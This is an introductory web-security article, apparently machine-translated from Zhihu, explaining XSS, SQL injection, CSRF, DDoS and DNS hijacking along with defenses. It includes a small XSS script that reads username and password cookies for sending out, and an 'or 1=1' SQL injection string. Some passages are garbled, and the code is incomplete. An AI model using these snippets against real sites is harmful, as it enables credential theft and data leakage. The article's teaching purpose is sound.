XSS attacks, SQL injection, CSRF attacks, DDOS attacks and DNS hijacking

Explain the common network attack methods:XSS attack, SQL injection, CSRF attack, DDOS attack and DNS hijacking.

XSS Attack

Full name cross-site scripting attack Cross Site Scripting

In order to distinguish it from the overlapping style sheet CSS, another abbreviation name was changed to XSS

XSS Attackers tamper with web pages and inject malicious HTML scripts, usually javascript. When users browse web pages, they control the user’s browser to perform malicious actions. An attack method that operates

XSS attacks are often used in forums, blogs and other applications. Attackers can steal users’ Cookie, passwords and other important data, and then forge transactions, steal user property, steal intelligence and other private information

Just like the picture above, if the user enters not normal text in the comment box, but a javascript script, and the user’s data is not processed in the background and is directly stored in the database, then When other users come to visit this page, the browser will inevitably execute this script.

Of course, this is just a bad taste, and real hackers will not only satisfy such bad taste, but may also want to obtain your personal information through these injection scripts , even your account password and other information

As can be seen from the above picture, the user actually introduced a third-party script when commenting. In this script, the cookie information of your browser is obtained and sent to the specified interface for saving and processing. In this way, you information has been leaked

//Logic in attack.js
var uname = $.cookie('username'); // Get account
var pwd = $.cookie('password'); // Get password

// send request
$('body').appendTo('');

In the above logic, the script obtains your personal information and sends your personal information to the back-end php file for processing and saving. In this way, your personal information has been leaked, so avoid xss attack is very important in network security

Therefore, the backend should never trust the data submitted by the user. When receiving the information submitted by the user, it must perform disinfection

That is to say, filter some special characters, such as <> in the javascript script, transfer <> and then store it, so that it can be effectively performed xss attack prevention

In addition, if the HttpOnly attribute is set in cookie, then the cookie information cannot be read through the js script, so It can also effectively prevent XSS attacks from stealing cookie content.

SQL injection

SQL injection attack refers to the attacker injecting malicious SQL commands into the HTTP request, and the server uses the request parameters to construct the database SQL command, malicious SQL is constructed together and executed in the database in order to obtain interesting data in the database or perform sensitive operations such as reading, modifying, deleting, and inserting on the database. This results in data being tampered with at will.

However, SQL injection attacks require the attacker to have some knowledge of the database tables. For example, if your project is open source and you accidentally disclose the database account and password; in addition, you If the website is online without Turn off debugging mode, interested people can guess the table structure based on the error echo of the website; in addition, there is blind injection, which means many interested people will know Blindly guess the data table structure, but this is the most difficult

SQL injection can be prevented through pre-compilation. Binding parameters is the best way to prevent SQL injection. Nowadays, popular frameworks basically implement SQL pre-compilation and parameter binding. Maliciously attacked SQL will be treated as SQL code> parameters instead of the SQL command is executed

# SQL to obtain user information normally
select * from users where id=1

# If 1 or 1=1 is injected into sql, all data in the user table can be found, leading to data leakage.
select * from users where id=1 or 1=1

CSRF attacks

CSRF stands for Cross Site Request Forgery. Attackers use cross-site requests to perform illegal operations as legitimate users, such as transferring money, posting comments, etc. Its core is to use the browser Cookie or the server’s Session policy to steal the user’s identity information.

When opening A website, open another Tab page and open the malicious Website B. At this time, on B page With malicious intent, the browser initiates a HTTP request to Website A

Because A website has been opened before, the browser stores Cookie or other information used for identity authentication in A website. This time it is Requests with malicious intentions will automatically carry this information, which will lead to identity hijacking and result in operation results that are not intended by the user.

The defense strategies corresponding to CSRF attack include: form token, Verification code, Referer detection, etc.

DDOS Attack

DDOS stands for Distributed Denial of Service, distributed denial of service attack. It is an upgraded version of the denial of service attack. Denial of service attack is actually to prevent your service from providing services to users normally. DDOS stands for Distributed Denial of Service, distributed denial of service attack. It is an upgraded version of the denial of service attack. A denial of service attack actually means that your service cannot provide services to users normally.

It is very easy to initiate a DoS attack in the early stage. You only need to write a program to overload the service and have no time to provide normal services. That is, requesting the service multiple times in one second will overwhelm the target server. memory run

Later, with the development of technology, today’s servers are all distributed, and there is no single server providing services. There are countless CDN nodes behind a service, and there are countless Web server. Trying to attack this kind of distributed network with a single server is tantamount to attacking a rock with an egg, and many DDOS attacks are not free now, so it is easy to steal the chicken. Eclipse rice

Defense methods: With the development of technology today, it is not possible to completely prevent the occurrence of such attacks, and can only be mitigated through technology. These include: Traffic Cleaning, SYN Cookie, etc.

DNS Hijacking

In today’s Internet traffic, the traffic generated by Web services, mainly HTTP/HTTPS, accounts for the vast majority

The development of Web services is in full swing, and an unknown contributor behind it is the domain name resolution system. DNS provides the ability to convert domain names into ip addresses service, each domain name resolution must go through DNS, so you can see its importance

Precisely because of its importance, DNS hijacking can easily be exploited by people with ulterior motives.

In the early days, security was not considered too much, so DNS was easily hijacked.

If an attacker tamperes with the DNS resolution settings and points the domain name from a normal IP to an illegal IP controlled by the attacker, it will cause us to access the domain name. is not the corresponding website, but a fake or website with ulterior motives. This attack method is DNS hijacking

You can also install an SSL certificate. The SSL certificate has a server identity authentication function, which can enable connection errors caused by DNS hijacking to be discovered and terminated in a timely manner

Reposted from: Understanding XSS attacks, SQL injection, CSRF attacks, DDOS attacks and DNS hijacking in one article – Zhihu

The knowledge points of the article match the official knowledge files, and you can further learn relevant knowledge. MySQL entry skill treeSQL advanced skillsCTE and recursive query 75586 people are learning the system